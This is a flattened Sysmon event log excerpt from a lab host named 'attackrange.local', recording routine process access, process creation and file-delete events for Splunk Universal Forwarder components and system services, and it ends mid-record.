18:11:43.554{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084590Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:11:43.554{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084589Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:11:43.554{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084588Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:11:43.554{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084587Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:11:43.554{B81B27B7-4012-611D-0500-00000000C801}420984C:\Windows\system32\csrss.exe{B81B27B7-4E5F-613A-4090-03000000C801}6752C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035084586Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:11:43.554{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-4E5F-613A-4090-03000000C801}6752C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035084585Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:11:43.538{B81B27B7-4E5F-613A-4090-03000000C801}6752C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000035084614Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:11:44.890{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9FDADD29D04BD5EB4B3AAD6394D60748,SHA256=CA9B9D1C13C934C53B29F54A95702AEBE09C3E443FADB7EF2B042C0580547D27,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035084613Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:11:44.821{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-4E60-613A-4290-03000000C801}6948C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084612Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:11:44.821{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084611Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:11:44.821{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084610Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:11:44.821{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084609Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:11:44.821{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084608Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:11:44.821{B81B27B7-4012-611D-0500-00000000C801}420536C:\Windows\system32\csrss.exe{B81B27B7-4E60-613A-4290-03000000C801}6948C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035084607Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:11:44.821{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-4E60-613A-4290-03000000C801}6948C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035084606Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:11:44.806{B81B27B7-4E60-613A-4290-03000000C801}6948C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000035084605Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:11:44.721{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=ACD1EE2F8ED87D22724B2ECC60328E11,SHA256=0610548FAB5665BAA6F5EB9AB054B5273B98E94F8347C9AE628E64ABFCF74584,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084604Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:11:44.721{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=01B17C850B8771045BCF25207E1113F4,SHA256=BD31CD9BD48157DB1619E657B0B47EE604BB72FEBF691A1C933A1EB37C615BB0,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035084603Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:11:44.374{B81B27B7-4E60-613A-4190-03000000C801}67121264C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084602Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:11:44.222{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-4E60-613A-4190-03000000C801}6712C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084601Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:11:44.222{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084600Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:11:44.222{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084599Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:11:44.222{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084598Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:11:44.222{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084597Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:11:44.222{B81B27B7-4012-611D-0500-00000000C801}420536C:\Windows\system32\csrss.exe{B81B27B7-4E60-613A-4190-03000000C801}6712C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035084596Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:11:44.222{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-4E60-613A-4190-03000000C801}6712C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035084595Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:11:44.207{B81B27B7-4E60-613A-4190-03000000C801}6712C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000035084616Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:11:45.935{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=57B81D87C21F0855DA363ED6B63A6F06,SHA256=5F3684C38E1B5F004D67F36CC984842F78E650D8B5CD015CBA2F2F151C0E056A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084615Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:11:45.820{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=ACD1EE2F8ED87D22724B2ECC60328E11,SHA256=0610548FAB5665BAA6F5EB9AB054B5273B98E94F8347C9AE628E64ABFCF74584,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084618Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:11:46.968{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=92B0EEC8EE4C059C5F85D7CE9EAE3220,SHA256=6BE8F4B00F88C76D54BE399AF6E5DDA3279129D31AE1099BEF95ED3F6394B14A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084617Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:11:46.869{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=2B96B827C544F847577B1D248FBD25AA,SHA256=E89C19BC18F9DEB8BD539B6845B8E2D468C6C1EDD045BDDC9A26B48661D669D1,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035084620Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:12:12.208{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT 